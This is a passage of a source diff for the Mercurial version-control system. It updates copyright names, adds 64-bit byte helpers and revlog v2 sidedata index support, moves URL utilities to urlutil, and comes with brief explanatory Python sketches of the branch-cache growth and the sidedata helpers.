"这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n"
"特定目的的隐含的担保。\n"
--- a/i18n/zh_TW.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/zh_TW.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Traditional Chinese translation for Mercurial
-# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others
# This file is distributed under the same license as the Mercurial package.
# Chia-Huan Wu <willie.tw@gmail.com>, 2009.
#
@@ -8191,7 +8191,7 @@
msgstr "\tSee 'hg help urls' for more information."
msgid ""
-"Copyright (C) 2005-2010 Matt Mackall and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
--- a/mercurial/ancestor.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/ancestor.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ancestor.py - generic DAG ancestor algorithm for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/bdiff.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bdiff.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
bdiff.c - efficient binary diff extension for Mercurial
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/bitmanipulation.h Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bitmanipulation.h Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,18 @@
#include "compat.h"
+/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long
+ enough */
+static inline uint64_t getbe64(const char *c)
+{
+ const unsigned char *d = (const unsigned char *)c;
+
+ return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) |
+ (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) |
+ (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) |
+ (((uint64_t)d[6]) << 8) | (d[7]));
+}
+
static inline uint32_t getbe32(const char *c)
{
const unsigned char *d = (const unsigned char *)c;
@@ -27,6 +39,20 @@
return ((d[0] << 8) | (d[1]));
}
+/* Writes a 64 bit integer to bytes in a big-endian format.
+ Assumes that the buffer is long enough */
+static inline void putbe64(uint64_t x, char *c)
+{
+ c[0] = (x >> 56) & 0xff;
+ c[1] = (x >> 48) & 0xff;
+ c[2] = (x >> 40) & 0xff;
+ c[3] = (x >> 32) & 0xff;
+ c[4] = (x >> 24) & 0xff;
+ c[5] = (x >> 16) & 0xff;
+ c[6] = (x >> 8) & 0xff;
+ c[7] = (x)&0xff;
+}
+
static inline void putbe32(uint32_t x, char *c)
{
c[0] = (x >> 24) & 0xff;
--- a/mercurial/bookmarks.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bookmarks.py Tue Apr 20 11:01:06 2021 -0400
@@ -27,6 +27,9 @@
txnutil,
util,
)
+from .utils import (
+ urlutil,
+)
# label constants
# until 3.5, bookmarks.current was the advertised name, not
@@ -597,10 +600,10 @@
# try to use an @pathalias suffix
# if an @pathalias already exists, we overwrite (update) it
if path.startswith(b"file:"):
- path = util.url(path).path
+ path = urlutil.url(path).path
for p, u in ui.configitems(b"paths"):
if u.startswith(b"file:"):
- u = util.url(u).path
+ u = urlutil.url(u).path
if path == u:
return b'%s@%s' % (b, p)
@@ -623,7 +626,7 @@
_binaryentry = struct.Struct(b'>20sH')
-def binaryencode(bookmarks):
+def binaryencode(repo, bookmarks):
"""encode a '(bookmark, node)' iterable into a binary stream
the binary format is:
@@ -645,7 +648,7 @@
return b''.join(binarydata)
-def binarydecode(stream):
+def binarydecode(repo, stream):
"""decode a binary stream into an '(bookmark, node)' iterable
the binary format is:
--- a/mercurial/branchmap.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/branchmap.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# branchmap.py - logic to computes, maintain and stores branchmap for local repo
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -39,6 +39,7 @@
Tuple,
Union,
)
+ from . import localrepo
assert any(
(
@@ -51,6 +52,7 @@
Set,
Tuple,
Union,
+ localrepo,
)
)
@@ -97,7 +99,7 @@
revs.extend(r for r in extrarevs if r <= bcache.tiprev)
else:
# nothing to fall back on, start empty.
- bcache = branchcache()
+ bcache = branchcache(repo)
revs.extend(cl.revs(start=bcache.tiprev + 1))
if revs:
@@ -129,6 +131,7 @@
if rbheads:
rtiprev = max((int(clrev(node)) for node in rbheads))
cache = branchcache(
+ repo,
remotebranchmap,
repo[rtiprev].node(),
rtiprev,
@@ -184,6 +187,7 @@
def __init__(
self,
+ repo,
entries=(),
tipnode=nullid,
tiprev=nullrev,
@@ -191,10 +195,11 @@
closednodes=None,
hasnode=None,
):
- # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None
+ # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None
"""hasnode is a function which can be used to verify whether changelog
has a given node or not. If it's not provided, we assume that every node
we have exists in changelog"""
+ self._repo = repo
self.tipnode = tipnode
self.tiprev = tiprev
self.filteredhash = filteredhash
@@ -280,6 +285,7 @@
if len(cachekey) > 2:
filteredhash = bin(cachekey[2])
bcache = cls(
+ repo,
tipnode=last,
tiprev=lrev,
filteredhash=filteredhash,
@@ -386,6 +392,7 @@
def copy(self):
"""return an deep copy of the branchcache object"""
return type(self)(
+ self._repo,
self._entries,
self.tipnode,
self.tiprev,
@@ -564,6 +571,7 @@
# [4 byte hash prefix][4 byte branch name number with sign bit indicating open]
_rbcrecfmt = b'>4sI'
_rbcrecsize = calcsize(_rbcrecfmt)
+_rbcmininc = 64 * _rbcrecsize
_rbcnodelen = 4
_rbcbranchidxmask = 0x7FFFFFFF
_rbccloseflag = 0x80000000
@@ -703,8 +711,10 @@
self._setcachedata(rev, reponode, branchidx)
return b, close
- def setdata(self, branch, rev, node, close):
+ def setdata(self, rev, changelogrevision):
"""add new data information to the cache"""
+ branch, close = changelogrevision.branchinfo
+
if branch in self._namesreverse:
branchidx = self._namesreverse[branch]
else:
@@ -713,7 +723,7 @@
self._namesreverse[branch] = branchidx
if close:
branchidx |= _rbccloseflag
- self._setcachedata(rev, node, branchidx)
+ self._setcachedata(rev, self._repo.changelog.node(rev), branchidx)
# If no cache data were readable (non exists, bad permission, etc)
# the cache was bypassing itself by setting:
#
@@ -728,11 +738,15 @@
if rev == nullrev:
return
rbcrevidx = rev * _rbcrecsize
- if len(self._rbcrevs) < rbcrevidx + _rbcrecsize:
- self._rbcrevs.extend(
- b'\0'
- * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs))
- )
+ requiredsize = rbcrevidx + _rbcrecsize
+ rbccur = len(self._rbcrevs)
+ if rbccur < requiredsize:
+ # bytearray doesn't allocate extra space, at least not in Python 3.7.
+ # When multiple changesets are added in a row, a precise resize would
+ # result in quadratic complexity. Overallocate to compensate by using
+ # the classic doubling technique for dynamic arrays instead.
+ # If there was a gap in the map before, less space will be reserved.
+ self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize))
pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx)
self._rbcrevslen = min(self._rbcrevslen, rev)
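
The overallocation hunk above is easier to see in isolation. Below is a minimal, runnable sketch of the growth strategy; the constants mirror the ones defined above, but the class and method bodies are a standalone toy, not Mercurial's real revbranchcache, and the node prefixes and branch indexes are made up:

    from struct import pack_into, calcsize

    _rbcrecfmt = '>4sI'                  # 4-byte node prefix + 4-byte branch index
    _rbcrecsize = calcsize(_rbcrecfmt)   # 8 bytes per record
    _rbcmininc = 64 * _rbcrecsize        # never grow by fewer than 64 records
    _rbccloseflag = 0x80000000           # sign bit marks a closed branch head

    class toyrevbranchcache(object):
        def __init__(self):
            self._rbcrevs = bytearray()

        def setdata(self, rev, nodeprefix, branchidx, close=False):
            if close:
                branchidx |= _rbccloseflag
            rbcrevidx = rev * _rbcrecsize
            requiredsize = rbcrevidx + _rbcrecsize
            if len(self._rbcrevs) < requiredsize:
                # Extending by at least requiredsize more than doubles the
                # buffer, so N sequential inserts cost O(N) amortized rather
                # than O(N^2) with exact resizing.
                self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize))
            pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, nodeprefix, branchidx)

    cache = toyrevbranchcache()
    cache.setdata(0, b'\xde\xad\xbe\xef', 1)
    cache.setdata(1, b'\xca\xfe\xba\xbe', 2, close=True)
    print(len(cache._rbcrevs))  # 512: one minimum increment, not 16 exact bytes
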
--- a/mercurial/bundle2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundle2.py Tue Apr 20 11:01:06 2021 -0400
@@ -177,7 +177,10 @@
url,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -1598,7 +1601,6 @@
b'digests': tuple(sorted(util.DIGESTS.keys())),
b'remote-changegroup': (b'http', b'https'),
b'hgtagsfnodes': (),
- b'rev-branch-cache': (),
b'phases': (b'heads',),
b'stream': (b'v2',),
}
@@ -1643,6 +1645,9 @@
# Else always advertise support on client, because payload support
# should always be advertised.
+ # b'rev-branch-cache' is no longer advertised, but still supported
+ # for legacy clients.
+
return caps
@@ -1769,7 +1774,7 @@
for node in outgoing.ancestorsof:
# Don't compute missing, as this may slow down serving.
fnode = cache.getfnode(node, computemissing=False)
- if fnode is not None:
+ if fnode:
chunks.extend([node, fnode])
if chunks:
@@ -1810,6 +1815,28 @@
return params
+def format_remote_wanted_sidedata(repo):
+ """Formats a repo's wanted sidedata categories into a bytestring for
+ capabilities exchange."""
+ wanted = b""
+ if repo._wanted_sidedata:
+ wanted = b','.join(
+ pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata)
+ )
+ return wanted
+
+
+def read_remote_wanted_sidedata(remote):
+ sidedata_categories = remote.capable(b'exp-wanted-sidedata')
+ return read_wanted_sidedata(sidedata_categories)
+
+
+def read_wanted_sidedata(formatted):
+ if formatted:
+ return set(formatted.split(b','))
+ return set()
+
+
def addpartbundlestream2(bundler, repo, **kwargs):
if not kwargs.get('stream', False):
return
@@ -1955,6 +1982,7 @@
b'version',
b'nbchanges',
b'exp-sidedata',
+ b'exp-wanted-sidedata',
b'treemanifest',
b'targetphase',
),
@@ -1997,11 +2025,15 @@
targetphase = inpart.params.get(b'targetphase')
if targetphase is not None:
extrakwargs['targetphase'] = int(targetphase)
+
+ remote_sidedata = inpart.params.get(b'exp-wanted-sidedata')
+ extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata)
+
ret = _processchangegroup(
op,
cg,
tr,
- b'bundle2',
+ op.source,
b'bundle2',
expectedtotal=nbchangesets,
**extrakwargs
@@ -2044,7 +2076,7 @@
raw_url = inpart.params[b'url']
except KeyError:
raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url')
- parsed_url = util.url(raw_url)
+ parsed_url = urlutil.url(raw_url)
if parsed_url.scheme not in capabilities[b'remote-changegroup']:
raise error.Abort(
_(b'remote-changegroup does not support %s urls')
@@ -2081,9 +2113,9 @@
cg = exchange.readbundle(op.repo.ui, real_part, raw_url)
if not isinstance(cg, changegroup.cg1unpacker):
raise error.Abort(
- _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url)
+ _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url)
)
- ret = _processchangegroup(op, cg, tr, b'bundle2', b'bundle2')
+ ret = _processchangegroup(op, cg, tr, op.source, b'bundle2')
if op.reply is not None:
# This is definitely not the final form of this
# return. But one need to start somewhere.
@@ -2097,7 +2129,7 @@
except error.Abort as e:
raise error.Abort(
_(b'bundle at %s is corrupted:\n%s')
- % (util.hidepassword(raw_url), e.message)
+ % (urlutil.hidepassword(raw_url), e.message)
)
assert not inpart.read()
@@ -2117,7 +2149,7 @@
contains binary encoded (bookmark, node) tuples. If the local state does
not match the one in the part, a PushRaced exception is raised
"""
- bookdata = bookmarks.binarydecode(inpart)
+ bookdata = bookmarks.binarydecode(op.repo, inpart)
msgstandard = (
b'remote repository changed while pushing - please try again '
@@ -2347,7 +2379,7 @@
When mode is 'records', the information is recorded into the 'bookmarks'
records of the bundle operation. This behavior is suitable for pulling.
"""
- changes = bookmarks.binarydecode(inpart)
+ changes = bookmarks.binarydecode(op.repo, inpart)
pushkeycompat = op.repo.ui.configbool(
b'server', b'bookmarks-pushkey-compat'
@@ -2478,35 +2510,10 @@
@parthandler(b'cache:rev-branch-cache')
def handlerbc(op, inpart):
- """receive a rev-branch-cache payload and update the local cache
-
- The payload is a series of data related to each branch
-
- 1) branch name length
- 2) number of open heads
- 3) number of closed heads
- 4) open heads nodes
- 5) closed heads nodes
- """
- total = 0
- rawheader = inpart.read(rbcstruct.size)
- cache = op.repo.revbranchcache()
- cl = op.repo.unfiltered().changelog
- while rawheader:
- header = rbcstruct.unpack(rawheader)
- total += header[1] + header[2]
- utf8branch = inpart.read(header[0])
- branch = encoding.tolocal(utf8branch)
- for x in pycompat.xrange(header[1]):
- node = inpart.read(20)
- rev = cl.rev(node)
- cache.setdata(branch, rev, node, False)
- for x in pycompat.xrange(header[2]):
- node = inpart.read(20)
- rev = cl.rev(node)
- cache.setdata(branch, rev, node, True)
- rawheader = inpart.read(rbcstruct.size)
- cache.write()
+ """Legacy part, ignored for compatibility with bundles from or
+ for Mercurial before 5.7. Newer Mercurial computes the cache
+ efficiently enough during unbundling that the additional transfer
+ is unnecessary."""
@parthandler(b'pushvars')
@@ -2561,8 +2568,6 @@
for r in repo.revs(b"::%ln", common):
commonnodes.add(cl.node(r))
if commonnodes:
- # XXX: we should only send the filelogs (and treemanifest). user
- # already has the changelog and manifest
packer = changegroup.getbundler(
cgversion,
repo,
@@ -2584,5 +2589,7 @@
part.addparam(b'treemanifest', b'1')
if b'exp-sidedata-flag' in repo.requirements:
part.addparam(b'exp-sidedata', b'1')
+ wanted = format_remote_wanted_sidedata(repo)
+ part.addparam(b'exp-wanted-sidedata', wanted)
return bundler
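
A note on the new exp-wanted-sidedata capability: the formatting and parsing helpers added above are exact inverses. A hedged round-trip sketch (the category names are hypothetical; real categories come from the repo's registered sidedata computers):

    def format_wanted(categories):
        # mirrors format_remote_wanted_sidedata: sorted, comma-separated
        if not categories:
            return b""
        return b','.join(sorted(categories))

    def read_wanted(formatted):
        # mirrors read_wanted_sidedata: an absent capability yields an empty set
        if formatted:
            return set(formatted.split(b','))
        return set()

    wanted = {b'copies-sd', b'test-sd'}          # hypothetical categories
    wire = format_wanted(wanted)
    assert wire == b'copies-sd,test-sd'
    assert read_wanted(wire) == wanted
    assert read_wanted(b'') == set()
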
--- a/mercurial/bundlecaches.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundlecaches.py Tue Apr 20 11:01:06 2021 -0400
@@ -9,6 +9,7 @@
from . import (
error,
+ requirements as requirementsmod,
sslutil,
util,
)
@@ -164,7 +165,7 @@
compression = spec
version = b'v1'
# Generaldelta repos require v2.
- if b'generaldelta' in repo.requirements:
+ if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements:
version = b'v2'
# Modern compression engines require v2.
if compression not in _bundlespecv1compengines:
--- a/mercurial/bundlerepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundlerepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -43,6 +43,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
class bundlerevlog(revlog.revlog):
@@ -61,7 +64,7 @@
self.repotiprev = n - 1
self.bundlerevs = set() # used by 'bundle()' revset expression
for deltadata in cgunpacker.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
size = len(delta)
start = cgunpacker.tell() - size
@@ -175,9 +178,15 @@
class bundlemanifest(bundlerevlog, manifest.manifestrevlog):
def __init__(
- self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b''
+ self,
+ nodeconstants,
+ opener,
+ cgunpacker,
+ linkmapper,
+ dirlogstarts=None,
+ dir=b'',
):
- manifest.manifestrevlog.__init__(self, opener, tree=dir)
+ manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir)
bundlerevlog.__init__(
self, opener, self.indexfile, cgunpacker, linkmapper
)
@@ -192,6 +201,7 @@
if d in self._dirlogstarts:
self.bundle.seek(self._dirlogstarts[d])
return bundlemanifest(
+ self.nodeconstants,
self.opener,
self.bundle,
self._linkmapper,
@@ -368,7 +378,9 @@
# consume the header if it exists
self._cgunpacker.manifestheader()
linkmapper = self.unfiltered().changelog.rev
- rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper)
+ rootstore = bundlemanifest(
+ self.nodeconstants, self.svfs, self._cgunpacker, linkmapper
+ )
self.filestart = self._cgunpacker.tell()
return manifest.manifestlog(
@@ -466,7 +478,7 @@
cwd = pathutil.normasprefix(cwd)
if parentpath.startswith(cwd):
parentpath = parentpath[len(cwd) :]
- u = util.url(path)
+ u = urlutil.url(path)
path = u.localpath()
if u.scheme == b'bundle':
s = path.split(b"+", 1)
--- a/mercurial/cacheutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cacheutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# scmutil.py - Mercurial core utility functions
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/cext/bdiff.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/bdiff.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
bdiff.c - efficient binary diff extension for Mercurial
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/charencode.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/charencode.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
charencode.c - miscellaneous character encoding
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/mpatch.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/mpatch.c Tue Apr 20 11:01:06 2021 -0400
@@ -14,7 +14,7 @@
allocation of intermediate Python objects. Working memory is about 2x
the total number of hunks.
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/osutil.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/osutil.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
osutil.c - native operating system services
- Copyright 2007 Matt Mackall and others
+ Copyright 2007 Olivia Mackall and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -119,7 +119,7 @@
static void listdir_stat_dealloc(PyObject *o)
{
- o->ob_type->tp_free(o);
+ Py_TYPE(o)->tp_free(o);
}
static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key)
--- a/mercurial/cext/parsers.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/parsers.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
parsers.c - efficient content parsing
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -638,7 +638,7 @@
PyObject *encodedir(PyObject *self, PyObject *args);
PyObject *pathencode(PyObject *self, PyObject *args);
PyObject *lowerencode(PyObject *self, PyObject *args);
-PyObject *parse_index2(PyObject *self, PyObject *args);
+PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs);
static PyMethodDef methods[] = {
{"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"},
@@ -646,7 +646,8 @@
"create a set containing non-normal and other parent entries of given "
"dirstate\n"},
{"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"},
- {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"},
+ {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS,
+ "parse a revlog index\n"},
{"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"},
{"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"},
{"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"},
--- a/mercurial/cext/pathencode.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/pathencode.c Tue Apr 20 11:01:06 2021 -0400
@@ -21,6 +21,7 @@
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
+#include "pythoncapi_compat.h"
#include "util.h"
@@ -678,7 +679,7 @@
}
assert(PyBytes_Check(ret));
- Py_SIZE(ret) = destlen;
+ Py_SET_SIZE(ret, destlen);
return ret;
}
--- a/mercurial/cext/revlog.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/revlog.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
parsers.c - efficient content parsing
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -15,6 +15,7 @@
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
+#include <structmember.h>
#include "bitmanipulation.h"
#include "charencode.h"
@@ -98,6 +99,7 @@
int ntlookups; /* # lookups */
int ntmisses; /* # lookups that miss the cache */
int inlined;
+ long hdrsize; /* size of index headers. Differs in v1 vs. v2 format */
};
static Py_ssize_t index_length(const indexObject *self)
@@ -113,14 +115,19 @@
static int index_find_node(indexObject *self, const char *node);
#if LONG_MAX == 0x7fffffffL
-static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#");
+static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#");
+static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki");
#else
-static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#");
+static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#");
+static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki");
#endif
/* A RevlogNG v1 index entry is 64 bytes long. */
static const long v1_hdrsize = 64;
+/* A Revlogv2 index entry is 96 bytes long. */
+static const long v2_hdrsize = 96;
+
static void raise_revlog_error(void)
{
PyObject *mod = NULL, *dict = NULL, *errclass = NULL;
@@ -157,7 +164,7 @@
static const char *index_deref(indexObject *self, Py_ssize_t pos)
{
if (pos >= self->length)
- return self->added + (pos - self->length) * v1_hdrsize;
+ return self->added + (pos - self->length) * self->hdrsize;
if (self->inlined && pos > 0) {
if (self->offsets == NULL) {
@@ -174,7 +181,7 @@
return self->offsets[pos];
}
- return (const char *)(self->buf.buf) + pos * v1_hdrsize;
+ return (const char *)(self->buf.buf) + pos * self->hdrsize;
}
/*
@@ -280,8 +287,9 @@
*/
static PyObject *index_get(indexObject *self, Py_ssize_t pos)
{
- uint64_t offset_flags;
- int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2;
+ uint64_t offset_flags, sidedata_offset;
+ int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2,
+ sidedata_comp_len;
const char *c_node_id;
const char *data;
Py_ssize_t length = index_length(self);
@@ -320,9 +328,19 @@
parent_2 = getbe32(data + 28);
c_node_id = data + 32;
- return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len,
- base_rev, link_rev, parent_1, parent_2, c_node_id,
- self->nodelen);
+ if (self->hdrsize == v1_hdrsize) {
+ return Py_BuildValue(v1_tuple_format, offset_flags, comp_len,
+ uncomp_len, base_rev, link_rev, parent_1,
+ parent_2, c_node_id, self->nodelen);
+ } else {
+ sidedata_offset = getbe64(data + 64);
+ sidedata_comp_len = getbe32(data + 72);
+
+ return Py_BuildValue(v2_tuple_format, offset_flags, comp_len,
+ uncomp_len, base_rev, link_rev, parent_1,
+ parent_2, c_node_id, self->nodelen,
+ sidedata_offset, sidedata_comp_len);
+ }
}
/*
@@ -373,18 +391,31 @@
static PyObject *index_append(indexObject *self, PyObject *obj)
{
- uint64_t offset_flags;
+ uint64_t offset_flags, sidedata_offset;
int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2;
- Py_ssize_t c_node_id_len;
+ Py_ssize_t c_node_id_len, sidedata_comp_len;
const char *c_node_id;
char *data;
- if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len,
- &uncomp_len, &base_rev, &link_rev, &parent_1,
- &parent_2, &c_node_id, &c_node_id_len)) {
- PyErr_SetString(PyExc_TypeError, "8-tuple required");
- return NULL;
+ if (self->hdrsize == v1_hdrsize) {
+ if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags,
+ &comp_len, &uncomp_len, &base_rev,
+ &link_rev, &parent_1, &parent_2,
+ &c_node_id, &c_node_id_len)) {
+ PyErr_SetString(PyExc_TypeError, "8-tuple required");
+ return NULL;
+ }
+ } else {
+ if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags,
+ &comp_len, &uncomp_len, &base_rev,
+ &link_rev, &parent_1, &parent_2,
+ &c_node_id, &c_node_id_len,
+ &sidedata_offset, &sidedata_comp_len)) {
+ PyErr_SetString(PyExc_TypeError, "10-tuple required");
+ return NULL;
+ }
}
+
if (c_node_id_len != self->nodelen) {
PyErr_SetString(PyExc_TypeError, "invalid node");
return NULL;
@@ -393,15 +424,15 @@
if (self->new_length == self->added_length) {
size_t new_added_length =
self->added_length ? self->added_length * 2 : 4096;
- void *new_added =
- PyMem_Realloc(self->added, new_added_length * v1_hdrsize);
+ void *new_added = PyMem_Realloc(self->added, new_added_length *
+ self->hdrsize);
if (!new_added)
return PyErr_NoMemory();
self->added = new_added;
self->added_length = new_added_length;
}
rev = self->length + self->new_length;
- data = self->added + v1_hdrsize * self->new_length++;
+ data = self->added + self->hdrsize * self->new_length++;
putbe32(offset_flags >> 32, data);
putbe32(offset_flags & 0xffffffffU, data + 4);
putbe32(comp_len, data + 8);
@@ -411,7 +442,14 @@
putbe32(parent_1, data + 24);
putbe32(parent_2, data + 28);
memcpy(data + 32, c_node_id, c_node_id_len);
+ /* Padding since SHA-1 is only 20 bytes for now */
memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len);
+ if (self->hdrsize != v1_hdrsize) {
+ putbe64(sidedata_offset, data + 64);
+ putbe32(sidedata_comp_len, data + 72);
+ /* Padding for 96-byte alignment */
+ memset(data + 76, 0, self->hdrsize - 76);
+ }
if (self->ntinitialized)
nt_insert(&self->nt, c_node_id, rev);
@@ -420,6 +458,56 @@
Py_RETURN_NONE;
}
+/* Replace an existing index entry's sidedata offset and length with new ones.
+ This cannot be used outside of the context of sidedata rewriting,
+ inside the transaction that creates the given revision. */
+static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args)
+{
+ uint64_t sidedata_offset;
+ int rev;
+ Py_ssize_t sidedata_comp_len;
+ char *data;
+#if LONG_MAX == 0x7fffffffL
+ const char *const sidedata_format = PY23("nKi", "nKi");
+#else
+ const char *const sidedata_format = PY23("nki", "nki");
+#endif
+
+ if (self->hdrsize == v1_hdrsize || self->inlined) {
+ /*
+ There is a bug in the transaction handling when going from an
+ inline revlog to a separate index and data file. Turn it off until
+ it's fixed, since v2 revlogs sometimes get rewritten on exchange.
+ See issue6485.
+ */
+ raise_revlog_error();
+ return NULL;
+ }
+
+ if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset,
+ &sidedata_comp_len))
+ return NULL;
+
+ if (rev < 0 || rev >= index_length(self)) {
+ PyErr_SetString(PyExc_IndexError, "revision outside index");
+ return NULL;
+ }
+ if (rev < self->length) {
+ PyErr_SetString(
+ PyExc_IndexError,
+ "cannot rewrite entries outside of this transaction");
+ return NULL;
+ }
+
+ /* Find the newly added node, offset from the "already on-disk" length
+ */
+ data = self->added + self->hdrsize * (rev - self->length);
+ putbe64(sidedata_offset, data + 64);
+ putbe32(sidedata_comp_len, data + 72);
+
+ Py_RETURN_NONE;
+}
+
static PyObject *index_stats(indexObject *self)
{
PyObject *obj = PyDict_New();
@@ -2563,14 +2651,17 @@
const char *data = (const char *)self->buf.buf;
